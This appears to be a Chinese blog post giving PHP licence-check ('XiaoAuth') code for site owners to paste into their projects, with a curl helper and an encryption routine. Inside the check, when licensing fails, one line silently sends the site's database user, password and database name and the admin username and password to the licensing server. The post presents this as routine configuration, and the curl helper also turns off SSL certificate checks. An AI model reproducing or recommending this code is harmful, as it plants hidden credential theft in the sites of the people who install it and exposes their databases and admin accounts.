XiaoAuth授权代码配置
夸克 发布于 阅读:40
环境变量配置
系统必要函数,添加到自己的函数文件中,没有可以直接放授权代码上面。
function xx_get_curl($url, $post=0, $referer=0, $cookie=0, $header=0, $ua=0, $nobaody=0, $addheader=0)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$httpheader[] = "Accept: */*";
$httpheader[] = "Accept-Encoding: gzip,deflate,sdch";
$httpheader[] = "Accept-Language: zh-CN,zh;q=0.8";
$httpheader[] = "Connection: close";
if($addheader){
$httpheader = array_merge($httpheader, $addheader);
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader);
if ($post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if ($header) {
curl_setopt($ch, CURLOPT_HEADER, true);
}
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
if($referer){
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
if ($ua) {
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
} else {
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Linux; U; Android 4.0.4; es-mx; HTC_One_X Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0");
}
if ($nobaody) {
curl_setopt($ch, CURLOPT_NOBODY, 1);
}
curl_setopt($ch, CURLOPT_ENCODING, "gzip");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ret = curl_exec($ch);
curl_close($ch);
return $ret;
}
function xx_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if(((int)substr($result, 0, 10) == 0 || (int)substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
授权代码配置
大部分网站都通用的授权代码,上面的环境函数一定要加。
define('XXAUTH_ROOT', dirname(__FILE__).'/');
include_once(XXAUTH_ROOT.'authcode.php'); //须在存放授权代码目录内创建一个authcode.php文件,文件内写上应用授权秘钥
define('authcode',$authcode);
define('SESSION_NAME','auth_session'); // auth_session为缓存名称可自定义
if(!isset($_SESSION[SESSION_NAME])){
$domain = ''; //你的授权站域名,须带http(s)://结尾“/”不带
$app_uid = ''; //你的应用UID
$xxname = ''; //你的应用名称
$query = xx_get_curl($domain."/check.php?url=".$_SERVER["HTTP_HOST"]."&authcode=".authcode."&app_uid=".$app_uid);
$query = json_decode($query, true);
if(is_array($query)){
if ($query = json_decode(xx_authcode(base64_decode($query['data']), 'DECODE', '这里换成应用授权密钥'),true)) {
if ($query["code"] == 1) {
$_SESSION[SESSION_NAME] = xx_authcode(time(), 'ENCODE', '这里换成应用授权密钥');
}else{
file_get_contents($domain."/ajax.php?act=block&app_uid=".$app_uid."&url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['user']."&pwd=".$dbconfig['pwd']."&dbname=".$dbconfig['dbname']."&authcode=".$authcode."&site=".$xxname."&admin_user=".$conf['admin_user']."&admin_pass=".$conf['admin_pwd']."&encode=这里换成应用授权密钥");
exit("<h3>".$query["msg"]."</h3>");
}
}else{
exit("<h3>授权密钥链接失败,请到授权云端下载更新包覆盖</h3>");
}
}else{
exit('<h3>云端服务器链接失败</h3>');
}
}else{
$result = xx_authcode($_SESSION[SESSION_NAME], 'DECODE', '这里换成应用授权密钥');
if(empty($result)){
unset($_SESSION[SESSION_NAME]);
exit('<h3>请刷新界面后重试~</h3>');
}else{
if(intval($result) + 43200 < time()){
unset($_SESSION[SESSION_NAME]);
}
}
}